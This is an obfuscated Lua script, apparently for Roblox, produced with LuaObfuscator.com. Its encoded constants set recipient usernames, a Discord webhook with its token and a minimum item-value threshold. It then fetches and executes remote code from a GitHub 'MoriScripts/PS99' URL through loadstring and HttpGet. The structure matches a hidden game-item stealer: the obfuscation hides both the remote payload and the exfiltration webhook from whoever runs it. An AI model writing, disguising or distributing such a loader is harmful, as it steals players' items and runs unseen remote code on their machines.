--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((929 -(214 + 713))^(v32-(2 -1))))%((5 -3)^(((v33-(878 -(282 + 584 + 11))) -(v32-(1 -0))) + (2 -1))) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v84 + v84))>=v84) and (4 -3)) or (117 -(8 + 24 + 85)) ;end end local function v21() local v34=957 -(892 + 65) ;local v35;while true do if (v34==(2 -1)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1 -(180 -(67 + 113))) ;v34=351 -(87 + 263) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;return (v37 * 256) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 4 ;return (v41 * 16777216) + (v40 * (260471 -194935)) + (v39 * (1208 -(802 + 150))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,1,53 -33 ) * ((7 -5)^(57 -25))) + v42 ;local v46=v20(v43,16 + 5 ,(34 -20) + 17 );local v47=((v20(v43,(56 + 973) -(915 + 82) )==(439 -(52 + 93 + 293))) and  -(431 -(44 + 386))) or ((887 -(261 + 624)) -1) ;if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * (1187 -(1069 + 118)) ;else v46=773 -(201 + 571) ;v44=(0 -0) -(1080 -(1020 + 60)) ;end elseif (v46==(4477 -2430)) then return ((v45==(0 + (1423 -(630 + 793)))) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-((6146 -4332) -(368 + (2002 -1579))) ) * (v44 + (v45/((6 -4)^52))) ;end local function v25(v48) local v49;if  not v48 then local v85=0 + 0 ;while true do if (v85==((766 -(745 + 21)) -0)) then v48=v23();if (v48==(1747 -(760 + 987))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1914 -(1789 + 43 + 81)) );v18=v18 + v48 ;local v50={};for v65=1, #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 -0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 0;end)();while true do if (v67==(935 -(39 + 896))) then if (v51~=(0 -0)) then else v52=(function() return function(v100,v101,v102) local v103=(function() return 0 -0 ;end)();local v104=(function() return;end)();while true do if ((0 -0)~=v103) then else v104=(function() return 0 + 0 ;end)();while true do if (v104==0) then v100[v101-#"|" ]=(function() return v102();end)();return v100,v101,v102;end end break;end end end;end)();v53=(function() return {};end)();v54=(function() return {};end)();v55=(function() return {};end)();v51=(function() return 1;end)();end if (v51==(2 + 0)) then v56[ #"91("]=(function() return v21();end)();for v96= #"<",v23() do local v97=(function() return 396 -(115 + 281) ;end)();local v98=(function() return;end)();while true do if (v97==(0 -0)) then v98=(function() return v21();end)();if (v20(v98, #"|", #" ")==(0 + 0)) then local v145=(function() return 0 -0 ;end)();local v146=(function() return;end)();local v147=(function() return;end)();local v148=(function() return;end)();while true do if (v145~=(3 -2)) then else local v161=(function() return 867 -(550 + 317) ;end)();while true do if (v161==(1 -0)) then v145=(function() return 2;end)();break;end if (v161==0) then v148=(function() return {v22(),v22(),nil,nil};end)();if (v146==0) then local v168=(function() return 0;end)();local v169=(function() return;end)();while true do if (v168==(0 -0)) then v169=(function() return 0 -0 ;end)();while true do if (v169==(285 -(134 + 151))) then v148[ #"91("]=(function() return v22();end)();v148[ #"0836"]=(function() return v22();end)();break;end end break;end end elseif (v146== #"{") then v148[ #"xxx"]=(function() return v23();end)();elseif (v146==(1667 -(970 + 695))) then v148[ #"nil"]=(function() return v23() -((3 -1)^(2006 -(582 + 1408))) ;end)();elseif (v146~= #"-19") then else local v174=(function() return 0 -0 ;end)();local v175=(function() return;end)();while true do if (v174==0) then v175=(function() return 0 -0 ;end)();while true do if (v175==0) then v148[ #"xnx"]=(function() return v23() -((7 -5)^16) ;end)();v148[ #".dev"]=(function() return v22();end)();break;end end break;end end end v161=(function() return 1;end)();end end end if (v145==(1826 -(1195 + 629))) then if (v20(v147, #" ", #":")== #"[") then v148[2 -0 ]=(function() return v58[v148[243 -(187 + 54) ]];end)();end if (v20(v147,782 -(162 + 618) ,2 + 0 )== #"~") then v148[ #"19("]=(function() return v58[v148[ #"asd"]];end)();end v145=(function() return 2 + 1 ;end)();end if (v145==3) then if (v20(v147, #"asd", #"19(")== #"/") then v148[ #"0313"]=(function() return v58[v148[ #"0313"]];end)();end v53[v96]=(function() return v148;end)();break;end if (v145==0) then v146=(function() return v20(v98,3 -1 , #"gha");end)();v147=(function() return v20(v98, #"http",9 -3 );end)();v145=(function() return 1 + 0 ;end)();end end end break;end end end for v99= #":",v23() do v54,v99,v28=(function() return v52(v54,v99,v28);end)();end return v56;end v67=(function() return 1637 -(1373 + 263) ;end)();end if (v67~=(1001 -(451 + 549))) then else if ((1 + 0)==v51) then local v95=(function() return 0;end)();while true do if (1==v95) then v58=(function() return {};end)();for v105= #"]",v57 do local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if ((1 -0)~=v106) then else if (v107== #"}") then v108=(function() return v21()~=(1384 -(746 + 638)) ;end)();elseif (v107==(1 + 1)) then v108=(function() return v24();end)();elseif (v107~= #"nil") then else v108=(function() return v25();end)();end v58[v105]=(function() return v108;end)();break;end if (0==v106) then local v150=(function() return 0;end)();while true do if (1~=v150) then else v106=(function() return 1;end)();break;end if (v150==(0 -0)) then v107=(function() return v21();end)();v108=(function() return nil;end)();v150=(function() return 342 -(218 + 123) ;end)();end end end end end v95=(function() return 2;end)();end if (v95==2) then v51=(function() return 2;end)();break;end if (v95~=0) then else v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v95=(function() return 1582 -(1535 + 46) ;end)();end end end break;end end end end local function v29(v59,v60,v61) local v62=v59[(581 -(361 + 219)) + 0 ];local v63=v59[(321 -(53 + 267)) + 1 ];local v64=v59[563 -(306 + 254) ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1;local v73= -(1 + 0);local v74={};local v75={...};local v76=v12("#",...) -(1 -0) ;local v77={};local v78={};for v86=0,v76 do if ((v86>=v70) or (3275==1804)) then v74[v86-v70 ]=v75[v86 + (1468 -(899 + 568)) ];else v78[v86]=v75[v86 + 1 + 0 ];end end local v79=(v76-v70) + (2 -1) ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=(610 -(268 + 335))) then if ((v81<=(293 -(60 + 230))) or (1417>3629)) then if (v81<=((130 + 443) -(426 + 146))) then if ((4795>402) and (v81==(0 + 0))) then v78[v80[2]]();else v78[v80[1458 -(282 + 1174) ]]=v61[v80[814 -(569 + 242) ]];end elseif (v81>(5 -3)) then do return;end else local v111=0 + 0 ;local v112;while true do if (v111==(1024 -(706 + 318))) then v112=v80[1253 -(721 + 530) ];v78[v112]=v78[v112](v13(v78,v112 + 1 ,v73));break;end end end elseif (v81<=(1276 -(945 + 326))) then if ((4813>3565) and (v81==((422 -(15 + 398)) -5))) then v78[v80[2 + 0 ]]=v80[703 -(271 + 429) ];else v78[v80[2]]();end elseif (v81==(6 + (982 -(18 + 964)))) then v61[v80[(5657 -4154) -(1408 + 92) ]]=v78[v80[1088 -(461 + 625) ]];else do return;end end elseif (v81<=11) then if (v81<=((751 + 546) -(993 + 295))) then if ((3912==3912) and (v81==(1 + 7))) then local v117=v80[(740 + 433) -(418 + 753) ];v78[v117]=v78[v117](v13(v78,v117 + 1 + 0 ,v73));else v78[v80[(851 -(20 + 830)) + 1 ]]=v80[1 + 2 ];end elseif (v81>(3 + 7)) then local v121=v80[2];local v122=v78[v80[532 -(406 + 123) ]];v78[v121 + (1770 -(1749 + 16 + 4)) ]=v122;v78[v121]=v122[v80[1 + 3 ]];else local v126=0;local v127;local v128;local v129;local v130;while true do if ((2821<=4824) and (v126==(1324 -(1249 + 73)))) then for v156=v127,v73 do local v157=0 + 0 ;while true do if (v157==(1145 -(466 + 679))) then v130=v130 + 1 ;v78[v156]=v128[v130];break;end end end break;end if ((1738<=2195) and (v126==(0 -(126 -(116 + 10))))) then v127=v80[2];v128,v129=v71(v78[v127](v13(v78,v127 + (2 -1) ,v80[1903 -(106 + 1794) ])));v126=1 + 0 ;end if (v126==(1 + 0)) then v73=(v129 + v127) -1 ;v130=0;v126=2;end end end elseif (v81<=(38 -25)) then if ((41<=3018) and (v81>(32 -20))) then v78[v80[116 -(4 + 110) ]]=v61[v80[587 -(57 + 527) ]];else local v133=v80[1429 -(4 + 37 + (2124 -(542 + 196))) ];local v134=v78[v80[106 -(17 + 86) ]];v78[v133 + 1 + (0 -0) ]=v134;v78[v133]=v134[v80[8 -4 ]];end elseif ((2145<=4104) and (v81>(40 -26))) then v61[v80[169 -(122 + 44) ]]=v78[v80[2 -0 ]];else local v140=0 + 0 ;local v141;local v142;local v143;local v144;while true do if ((2689<4845) and ((6 -4)==v140)) then for v158=v141,v73 do v144=v144 + 1 + 0 ;v78[v158]=v142[v144];end break;end if (((1 + 0)==v140) or (2322>2622)) then v73=(v143 + v141) -(1 -0) ;v144=65 -(16 + 14 + 35) ;v140=2 + 0 ;end if (v140==0) then v141=v80[(454 + 805) -(1043 + 214) ];v142,v143=v71(v78[v141](v13(v78,v141 + (3 -2) ,v80[3])));v140=1213 -(323 + 889) ;end end end v72=v72 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3Q0003083Q00557365726E616D6503113Q0050617472796B319Q303003093Q00557365726E616D6532030A3Q007061637A61746F67656A03073Q00576562682Q6F6B037B3Q0028682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F3132393739303236313839333231352Q342Q302F663044625143306D523062385237726C6834685F52434C6661554F416533754657656E426C4F6C5F5346746C3Q67522D664850353249734C4433747A66526F52536C7429030A3Q004D696E696D756D524150024Q0080841E41030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403423Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F496D4469676974616C7A2F4D6F7269536372697074732F6D61696E2F50532Q3900103Q0012043Q00023Q0012063Q00013Q0012043Q00043Q0012063Q00033Q0012043Q00063Q0012063Q00053Q0012043Q00083Q0012063Q00073Q00120D3Q00093Q00120D0001000A3Q00200C00010001000B0012040003000C4Q000E000100034Q00025Q00026Q000100012Q00073Q00017Q00",v9(),...);
